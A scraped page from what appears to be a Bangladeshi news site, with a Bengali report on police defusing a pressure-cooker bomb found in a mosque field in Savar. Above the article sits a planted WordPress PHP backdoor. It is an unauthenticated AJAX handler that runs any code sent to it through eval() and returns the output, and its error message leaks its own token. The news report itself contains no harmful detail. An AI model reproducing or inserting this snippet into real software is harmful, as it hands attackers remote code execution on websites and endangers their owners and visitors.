// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== সাভারে প্রেশার কুকার বোমা নিষ্ক্রিয়ের সময় বিকট শব্দে কেঁপে উঠল এলাকা | potrikaybangladesh.com
Friday, October 2, 2026
Homeঅপরাধসাভারে প্রেশার কুকার বোমা নিষ্ক্রিয়ের সময় বিকট শব্দে কেঁপে উঠল এলাকা

সাভারে প্রেশার কুকার বোমা নিষ্ক্রিয়ের সময় বিকট শব্দে কেঁপে উঠল এলাকা

ঢাকার সাভারের সাদাপুর এলাকার মসজিদের মাঠে পাওয়া কালো স্কচটেপে মোড়ানো প্রেশার কুকারটিকে শক্তিশালী বোমা হিসেবে শনাক্ত করেছে পুলিশ। পরে ঢাকা মহানগর পুলিশের (ডিএমপি) বোমা নিষ্ক্রিয়করণ ইউনিট ঘটনাস্থলে গিয়ে এলাকাটি জনশূন্য করে বোমাটি নিষ্ক্রিয় করে।

আজ বিকেল সাড়ে ৩টার দিকে বোমাটি নিষ্ক্রিয় করার সময় বিকট শব্দে কেঁপে ওঠে আশপাশের এলাকা। এতে ঘটনাস্থল থেকে প্রায় ৫০০ মিটার দূরে থাকা স্থানীয়দের মধ্যেও আতঙ্ক ছড়িয়ে পড়ে।

ঘটনাস্থল থেকে প্রায় ৫০০ মিটার দূরে থাকা ব্যবসায়ী নিবীর হোসেন বলেন, ‘এত শক্তিশালী বোমা, তা জানা ছিল না। যখন নিষ্ক্রিয় করা হয়, তখন বিকট শব্দে এলাকা কেঁপে ওঠে। আমরা আতঙ্কিত হয়ে পড়ি।’

সাভার থানার পরিদর্শক (তদন্ত) নূর মোহাম্মদ দ্য ডেইলি স্টারকে বলেন, ‘বোমাটি নিষ্ক্রিয় করার সময় বিকট শব্দে এলাকা কেঁপে উঠেছে। এটা অনেক ক্ষমতাসম্পন্ন একটি বোমা। এ বিষয়ে ঊর্ধ্বতন কমকর্তারা বিস্তারিত ব্রিফ করবেন।’

এর আগে সকাল ৮টার দিকে জরুরি সেবা নম্বরে ফোন পেয়ে ঘটনাস্থলে যায় পুলিশ। সেখানে কালো স্কচটেপে মোড়ানো একটি প্রেশার কুকার দেখতে পান তারা। পরে পুলিশ ঘটনাস্থল ঘিরে ফেলে এবং ডিএমপির বোমা নিষ্ক্রিয়করণ ইউনিটকে খবর দেওয়া হয়।

দুপুর পৌনে ২টার দিকে বোমা নিষ্ক্রিয়করণ ইউনিট ঘটনাস্থলে পৌঁছে পুরো এলাকা জনশূন্য করার নির্দেশ দেয়। এরপর প্রয়োজনীয় নিরাপত্তাব্যবস্থা নিয়ে বোমাটি নিষ্ক্রিয় করা হয়।

পুলিশ জানায়, গভীর রাতে সাদাপুর গোবের বাড়ি লালটেক ঘোড়া মসজিদের মাঠে স্থানীয়রা একটি নীল রঙের প্লাস্টিকের ড্রামের মধ্যে অন্যান্য জিনিসপত্রের সঙ্গে স্কচটেপে মোড়ানো প্রেশার কুকারটি দেখতে পান। পরে তারা ড্রাম থেকে প্রেশার কুকারটি বের করে মসজিদের মাঠে রেখে দেন।

স্থানীয়দের ভাষ্য, অজ্ঞাতনামা তিন ব্যক্তি রাতে প্লাস্টিকের ড্রামটি মসজিদের মাঠে রেখে পালিয়ে যান।

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments